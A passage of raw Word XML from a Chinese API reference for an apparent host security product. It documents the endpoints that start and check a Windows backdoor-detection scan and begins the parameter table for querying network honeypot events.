          <w:p w14:paraId="33BF6200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="501F666D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA947ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C393140" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D86CB41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="windows后门检测-开始扫描"/>
      <w:bookmarkEnd w:id="164"/>
      <w:r>
        <w:t>Windows后门检测-开始扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57302EAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Windows后门检测执行扫描任务的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B167B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031A6E04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/backdoor/win/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB3059"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2359F0A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A7A9635" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BE151DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E0E4043" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53C40E00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B47C304" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C727B5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EF3247A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CB5508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0389DF4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7152FBFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B1165F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1580A133" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B4E27F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7061C1C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="473AE1DF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1799A820" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD3824D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="593ACA65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F735970" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F80D17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B0678" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realmType": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD3FEA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC9345" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660AB92C"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497C54" w14:paraId="55C5013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46EB788" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6683C17C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67A28D28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620E32F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F6DA804" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01CDA27C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48DF254B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33A69B92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19AAFB0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD3852F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A92CD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>1、如果功能开关未打开，则会抛出异常及相关提示</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、如果上次扫描任务未执行完毕，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A5355" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="windows后门检测-查询扫描"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r>
        <w:t>Windows后门检测-查询扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB96D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Windows后门检测当前正在执行的扫描任务的状态查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616630A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864AD17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/backdoor/win/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395116F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA9968" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C13E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67647F20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/backdoor/win/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DD248" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128DDF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "retcode": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7FCFD"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941"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3347"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3053D51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411287E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214B0E31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576C2BEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDDA019" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FE693AF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B22D6DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229960EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71286E56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="371DDE51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2:正在执行 3:执行成功 4:执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EE8AE6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BBC5447" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F9E802" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684661C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F20F876" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2:running 3:success 4: failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F7819E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="网络蜜罐"/>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>网络蜜罐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D86CDB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="查询结果-7"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EF007" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐上报事件的数据查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AEA66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F2B31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/honeypot/{linux,win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C8AC00"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915"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7D9FBF9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27B547D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30652D1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34803BA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="367D3D27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="589DEFFD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74859CBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DA9776" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F16881" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1842E027" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56ED7155" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E0CA31D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05DA6016" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25A4E996" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42A1DECF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="373D8EA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E21A451" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA99A7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54983F9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCD6F8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74471AAF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
